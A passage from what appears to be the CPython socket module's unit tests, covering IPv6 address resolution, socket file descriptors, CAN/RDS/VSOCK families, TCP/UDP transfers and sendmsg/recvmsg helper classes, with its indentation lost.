self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
